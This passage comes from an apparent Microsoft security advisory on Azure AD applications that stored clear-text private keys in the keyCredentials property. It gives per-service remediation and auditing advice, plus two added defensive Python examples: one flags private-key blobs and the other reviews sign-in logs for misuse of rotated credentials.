As a result, clear text private key material in the keyCredentials property is inaccessible, mitigating the risks associated with storage of this material in the property.

As a precautionary measure, Microsoft is recommending customers using these services take action as described in “Affected products/services,” below. We are also recommending that customers who suspect private key data may have been added to credentials for additional Azure AD applications or Service Principals in their environments follow this guidance.

Affected products/services

Microsoft has identified the following platforms/services that stored their private keys in the public property. We have notified customers who have impacted Azure AD applications created by these services and notified them via Azure Service Health Notifications to provide remediation guidance specific to the services they use.

For each affected product/service, the entries below give Microsoft's mitigation and the customer impact assessment and remediation.

Product/Service: Azure Automation
Azure Automation uses the Application and Service Principal keyCredential APIs when Automation Run-As Accounts are created.
Microsoft's mitigation: Azure Automation deployed an update to the service to prevent private key data in clear text from being uploaded to Azure AD applications.
Customer impact assessment and remediation: Run-As accounts created or renewed after 10/15/2021 are not impacted and do not require further action. Automation Run-As accounts created with an Azure Automation self-signed certificate between 10/15/2020 and 10/15/2021 that have not been renewed are impacted. Separately, customers who bring their own certificates could be affected, regardless of the renewal date of the certificate.
To identify and remediate impacted Azure AD applications associated with impacted Automation Run-As accounts, please navigate to this GitHub repo.
In addition, Azure Automation supports Managed Identities (GA announced in October 2021). Migrating from Run-As accounts to Managed Identities will mitigate this issue. Please follow the guidance here to migrate.

Product/Service: Azure Migrate
The Azure Migrate service creates Azure AD applications to enable Azure Migrate appliances to communicate with the service's endpoints.
Microsoft's mitigation: Azure Migrate deployed an update to prevent private key data in clear text from being uploaded to Azure AD applications.
Customer impact assessment and remediation: Azure Migrate appliances that were registered after 11/02/2021 and had Appliance configuration manager version 6.1.220.1 and above are not impacted and do not require further action. Azure Migrate appliances registered prior to 11/02/2021, and/or appliances registered after 11/02/2021 where auto-update was disabled, could be affected by this issue.
To identify and remediate any impacted Azure AD applications associated with Azure Migrate appliances, please navigate to this link.

Product/Service: Azure Site Recovery
Azure Site Recovery (ASR) creates Azure AD applications to communicate with the ASR service endpoints.
Microsoft's mitigation: Azure Site Recovery deployed an update to prevent private key data from being uploaded to Azure AD applications.
Customer impact assessment and remediation: Customers using Azure Site Recovery's preview experience "VMware to Azure Disaster Recovery" after 11/01/2021 are not impacted and do not require further action. Customers who have deployed and registered the preview version of the VMware to Azure DR experience with ASR before 11/01/2021 could be affected.
To identify and remediate the impacted Azure AD applications associated with Azure Site Recovery appliances, please navigate to this link.

Product/Service: Azure AD applications and Service Principals [1]
Microsoft's mitigation: Microsoft has blocked reading private key data as of 10/30/2021.
Customer impact assessment and remediation: Follow the guidance available at aad-app-credential-remediation-guide to assess whether your application key credentials need to be rotated. The guidance walks through the assessment steps to identify if private key information was stored in keyCredentials and provides remediation options for credential rotation.

[1] This issue only affects Azure AD Applications and Service Principals where private key material in clear text was added to a keyCredential. Microsoft recommends taking precautionary steps to identify any additional instances of this issue in applications where you manage credentials and take remediation steps if impact is found.
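As an added example (not Microsoft's remediation guide or any code from it), the following Python inspects keyCredentials entries in the Microsoft Graph JSON shape and flags blobs that are private key containers rather than certificates, which is the condition this issue is about; it is useful as a pre-upload check in deployment tooling or on exported application manifests, since Azure AD now returns null for the blocked data. The DER header heuristic and all sample blobs and keyIds are assumptions constructed for the example.

```python
import base64

def _der_tlv(buf, pos=0):
    """Return (tag, value_start, value_end) of the DER element at pos."""
    tag, length, hdr = buf[pos], buf[pos + 1], 2
    if length & 0x80:                     # long form: next N bytes carry the length
        n = length & 0x7F
        length, hdr = int.from_bytes(buf[pos + 2:pos + 2 + n], "big"), 2 + n
    return tag, pos + hdr, pos + hdr + length

def classify_key_blob(b64):
    """'public' (certificate/SPKI), 'private' (PKCS#1/#8/#12 container) or 'unknown'."""
    raw = base64.b64decode(b64)
    if b"PRIVATE KEY-----" in raw:        # PEM-armored private key, plain or encrypted
        return "private"
    if raw.startswith(b"-----BEGIN CERTIFICATE-----"):
        return "public"
    try:
        tag, start, _ = _der_tlv(raw)     # outer element
        inner, _, _ = _der_tlv(raw, start)  # first element inside it
    except IndexError:                    # too short to be any DER structure
        return "unknown"
    if tag != 0x30:
        return "unknown"
    if inner == 0x30:                     # SEQUENCE{SEQUENCE..}: X.509 cert or SubjectPublicKeyInfo
        return "public"
    if inner == 0x02:                     # SEQUENCE{INTEGER..}: PKCS#1, PKCS#8 or PKCS#12 (PFX v3)
        return "private"
    return "unknown"

def find_private_key_credentials(app):
    """keyIds whose 'key' blob looks like private key material; null keys are skipped."""
    return [c["keyId"] for c in app.get("keyCredentials", [])
            if c.get("key") and classify_key_blob(c["key"]) == "private"]

def _b64(b):
    return base64.b64encode(b).decode()

# Constructed sample in the Graph keyCredentials shape (example data only); the
# blobs are minimal DER headers, not real certificates or keys.
SAMPLE_APP = {"displayName": "example-app", "keyCredentials": [
    {"keyId": "00000000-0000-0000-0000-000000000001", "key": _b64(b"\x30\x0a\x30\x08" + b"\x01" * 8)},
    {"keyId": "00000000-0000-0000-0000-000000000002", "key": _b64(b"\x30\x06\x02\x01\x03\x30\x01\x00")},
    {"keyId": "00000000-0000-0000-0000-000000000003", "key": _b64(b"-----BEGIN RSA PRIVATE KEY-----\n")},
    {"keyId": "00000000-0000-0000-0000-000000000004", "key": None},  # blocked by Azure AD: null
]}
```

Any keyId the check returns should be treated as exposed and rotated, whether the blob came from an exported manifest or from your own upload pipeline.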

What else can I do to audit and investigate applications for unexpected use?

Additionally, as a best practice, we recommend auditing and investigating applications for unexpected use:

  • Audit the permissions that have been granted to the impacted entities (subscription access, roles, OAuth permissions, etc.) to assess impact in case the credentials were exposed. Refer to the Application permission section in the security operations guide.
  • If you rotated the credential for your application/service principal, we suggest investigating for unexpected use of the impacted entity, especially if it has high privilege permissions to sensitive resources. Additionally, review the security guidance on least privilege access for apps to ensure your applications are configured with least privilege access.
  • Check sign-in logs, AAD audit logs and M365 audit logs for anomalous activity, such as sign-ins from unexpected IP addresses.
  • Customers who have Microsoft Sentinel deployed in their environment can leverage notebook/playbook/hunting queries to look for potentially malicious activities. Look for more guidance here.
  • For more information refer to the security operations guidance.
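Added example, not from this post or from Microsoft Sentinel content: after a credential has been rotated, this Python reviews service principal sign-in records for the two signals the bullets above call out, sign-ins from unexpected source addresses and any use of the rotated keyId after the rotation time. The records are constructed, and the column names (modelled on the AADServicePrincipalSignInLogs table), the rotation time and the expected networks are assumptions.

```python
from datetime import datetime, timezone
from ipaddress import ip_address, ip_network

# Assumed inputs: rotation time, the keyId that was rotated out, and the networks
# from which this service principal legitimately authenticates (documentation ranges).
ROTATED_AT = datetime(2021, 11, 5, 12, 0, tzinfo=timezone.utc)
OLD_KEY_ID = "00000000-0000-0000-0000-000000000002"
EXPECTED_NETS = [ip_network("203.0.113.0/24")]

# Constructed sign-in records; column names follow the AADServicePrincipalSignInLogs
# table as assumed here. ResultType "0" is a successful sign-in, anything else a failure.
SAMPLE_SIGNINS = [
    {"TimeGenerated": "2021-11-04T08:00:00Z", "IPAddress": "203.0.113.10",
     "ServicePrincipalCredentialKeyId": OLD_KEY_ID, "ResultType": "0"},
    {"TimeGenerated": "2021-11-05T13:30:00Z", "IPAddress": "198.51.100.7",
     "ServicePrincipalCredentialKeyId": OLD_KEY_ID, "ResultType": "0"},
    {"TimeGenerated": "2021-11-06T09:00:00Z", "IPAddress": "203.0.113.11",
     "ServicePrincipalCredentialKeyId": "00000000-0000-0000-0000-000000000003", "ResultType": "0"},
    {"TimeGenerated": "2021-11-06T09:05:00Z", "IPAddress": "192.0.2.44",
     "ServicePrincipalCredentialKeyId": OLD_KEY_ID, "ResultType": "700027"},  # constructed failure code
]

def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)

def review_signins(records, rotated_at, old_key_id, expected_nets):
    """Return (TimeGenerated, [reasons]) for every sign-in that needs a closer look."""
    findings = []
    for r in records:
        reasons = []
        if not any(ip_address(r["IPAddress"]) in net for net in expected_nets):
            reasons.append("unexpected source IP")
        # The rotated-out key must not authenticate after rotation: a success means the
        # rotation did not actually remove it, a failure means someone still holds it.
        if r["ServicePrincipalCredentialKeyId"] == old_key_id and _ts(r["TimeGenerated"]) >= rotated_at:
            outcome = "succeeded" if r["ResultType"] == "0" else "failed"
            reasons.append(f"old credential used after rotation ({outcome})")
        if reasons:
            findings.append((r["TimeGenerated"], reasons))
    return findings

if __name__ == "__main__":
    for when, why in review_signins(SAMPLE_SIGNINS, ROTATED_AT, OLD_KEY_ID, EXPECTED_NETS):
        print(when, "; ".join(why))
```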

Part of any robust security posture is working with researchers to help find vulnerabilities, so we can fix any findings before they are misused. We want to thank Karl Fosaaen of NetSPI who reported this vulnerability and Allscripts who worked with the Microsoft Security Response Center (MSRC) under Coordinated Vulnerability Disclosure (CVD) to help keep Microsoft customers safe.